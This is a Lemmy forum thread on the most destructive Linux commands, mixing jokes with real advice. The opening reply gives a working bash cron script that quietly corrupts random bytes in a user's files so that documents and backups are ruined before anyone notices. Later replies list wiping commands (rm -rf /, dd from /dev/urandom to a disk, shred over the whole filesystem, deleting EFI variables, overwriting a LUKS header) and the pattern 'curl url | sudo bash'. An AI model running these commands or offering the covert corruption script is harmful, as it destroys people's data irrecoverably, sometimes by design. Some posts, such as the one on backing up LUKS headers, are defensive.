• WetFerret@lemmy.world · ↑60 · 1 year ago

    Many people have given great suggestions for the most destructive commands, but most result in an immediately borked system. While inconvenient, that doesn’t have a lasting impact on users who have backups.

    I propose writing a bash script, set up to run daily in cron, which picks a random file in the user’s home directory tree and randomizes just a few bytes of data in it. The script doesn’t immediately damage basic OS functionality, and the data degradation is so slow that by the time the user realizes something fishy is going on, a lot of their documents, media, and hopefully a few months’ worth of backups will have been corrupted.
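
    Something like this would do the trick (a rough, untested sketch; the script name, byte count, and schedule are made up for illustration):

    #!/usr/bin/env bash
    # bitrot.sh (hypothetical): flip a few random bytes in one random file
    # under $HOME each run, e.g. from a daily cron entry like:
    #   @daily /home/user/.local/bin/bitrot.sh

    # pick one writable regular file at random from the home directory tree
    target=$(find "$HOME" -type f -writable 2>/dev/null | shuf -n 1)
    [ -n "$target" ] || exit 0

    size=$(stat -c %s "$target")
    [ "$size" -gt 0 ] || exit 0

    # overwrite three bytes at random offsets, without truncating the file
    for _ in 1 2 3; do
        offset=$(( (RANDOM * 32768 + RANDOM) % size ))
        dd if=/dev/urandom of="$target" bs=1 count=1 seek="$offset" \
            conv=notrunc status=none
    done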

  • LKC@sh.itjust.works · ↑54 ↓1 · 1 year ago

    If you allow root privileges, there is:

    sudo rm -rf --no-preserve-root /

    If you want to be malicious:

    sudo dd if=/dev/urandom of=/dev/sdX

    or

    sudo find / -exec shred -u {} \;

    • oriond@lemmy.ml (OP) · ↑1 · 1 year ago

      What does this do? Nobody can read any file? Would sudo chmod 777 fix it, at least enough to get back to a usable system?

      • Ruscal@sh.itjust.works · ↑6 · 1 year ago

        The trick is that you lose access to every file on the system. chmod is also a file. And ls. And sudo. You see where this is going. The system will kinda work after this command, but rebooting (which, by coincidence, is a common action for “fixing” things) will reveal that the system is dead.

    • Carighan Maconar@lemmy.world · ↑12 · 1 year ago

      Everyone else talking about how to shred files or even the BIOS is missing a bigger leap, yeah: not just destroying the computer, but destroying the person in front of it! And vim is happy to provide. 😅

    • TopRamenBinLaden@sh.itjust.works · ↑2 · 1 year ago

      True, just opening vim on a PC for a user who doesn’t know about vim’s existence is basically a prison sentence. They will literally be trapped in vim hell until they power down their PC.

      • electric_nan@lemmy.ml · ↑2 · 1 year ago

        I once entered vim into a computer. I couldn’t exit. I tried unplugging the computer but vim persisted. I took it to the dump, where I assume vim is still running to this very day.

  • MuchPineapples@lemmy.world · ↑26 ↓1 · edited · 1 year ago

    Everyone is deleting data, but with proper backups that’s not a problem. How about:

    curl insert_url_here | sudo bash

    This can really mess up your life.

    Even if the script isn’t malicious, if the connection drops out halfway through the download you might end up executing an “rm -r /”, or similar, command.
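
    The classic failure mode looks something like this (hypothetical install script, paths made up); bash runs whatever bytes arrived before the connection died, including a half-transferred line:

    # what the full script on the server says
    rm -rf /usr/local/myapp-old
    cp -r ./build /usr/local/myapp

    # what the pipe actually delivers if the connection dies mid-line
    rm -rf /usr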

  • zephyr@lemmy.world · ↑18 · edited · 1 year ago

    Everyone is talking about rm -rf / and damage to storage drives, but I read somewhere that messing with EFI variables can brick the computer itself. If that’s possible, the damage goes well beyond the disk drives.

    Edit: here is an interesting SE post: https://superuser.com/questions/313850
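
    For reference, the command people mention is along these lines (an illustration only; on many distros efivarfs is mounted read-write, and deleting the variables under it has reportedly bricked machines with buggy UEFI firmware):

    # rm -rf / can reach this path too, since it is writable by root
    sudo rm -rf /sys/firmware/efi/efivars/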

    • grabyourmotherskeys@lemmy.world · ↑2 ↓1 · 1 year ago

      I did have RH Linux die while updating core libs a very long time ago. It deleted them and the system shut down. No reboot possible. I eventually (like later that day) copied a set of libs over from another RH system and was able to boot and recover.

      Never used RH by choice again after that.

  • nodsocket@lemmy.world · ↑19 ↓5 · edited · 1 year ago

    ./self_destruct.sh

    Assuming you have a script that triggers explosives to destroy your computer.

    • slazer2au@lemmy.world · ↑5 · 1 year ago

      Reminds me of those DEF CON talks where they discover it’s really hard to pack an HDD-killing device into a 2RU server.

  • oriond@lemmy.ml (OP) · ↑5 · edited · 1 year ago

    I can’t remember exactly, but since my hard drive is encrypted, I believe there is a single file which, if you mess with it, renders the drive undecryptable.

    • nodsocket@lemmy.world · ↑10 · 1 year ago

      The LUKS headers. If those are corrupted you can’t decrypt the drive. The good news is that you can back up the headers to prevent that from happening.
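
      Something along these lines (the device name and backup path are just examples):

      # back up the LUKS header and key-slot area to a file
      sudo cryptsetup luksHeaderBackup /dev/sdX2 \
          --header-backup-file /root/sdX2-luks-header.img

      # if the header ever gets damaged, restore it from that file
      sudo cryptsetup luksHeaderRestore /dev/sdX2 \
          --header-backup-file /root/sdX2-luks-header.img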

      • waigl@lemmy.world · ↑4 · 1 year ago

        Those aren’t files, though; they are just some sectors on your block device. Sure, if you mess with those, your ability to decrypt your disk goes out the window, but then, when was bypassing the filesystem and messing with bits on your disk directly ever safe?

        It’s possible he was using an encrypted key file instead of just a password, for that extra-strong security. In that case, of course, if you lose that file, kiss your data goodbye.
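
        (For what it’s worth, enrolling a keyfile in a LUKS slot looks roughly like this; the device and path are just examples:)

        # generate a random keyfile and add it to a free key slot
        sudo dd if=/dev/urandom of=/root/luks.key bs=512 count=1
        sudo cryptsetup luksAddKey /dev/sdX2 /root/luks.key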

    • oriond@lemmy.ml (OP) · ↑1 · edited · 1 year ago

      Here is the command that will render a LUKS-encrypted device unrecoverable, straight from the documentation:

      5.4 How do I securely erase a LUKS container?

      For LUKS, if you are in a desperate hurry, overwrite the LUKS header and key-slot area. For LUKS1 and LUKS2, just be generous and overwrite the first 100MB. A single overwrite with zeros should be enough. If you anticipate being in a desperate hurry, prepare the command beforehand. Example with /dev/sde1 as the LUKS partition and default parameters:

      head -c 100000000 /dev/zero > /dev/sde1; sync
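
      Note that the > redirection in that example is performed by your shell, not by head, so plain sudo on the command won’t help; it needs an actual root shell. A rough equivalent that works under sudo (using the FAQ’s example device):

      sudo dd if=/dev/zero of=/dev/sde1 bs=1M count=100; sync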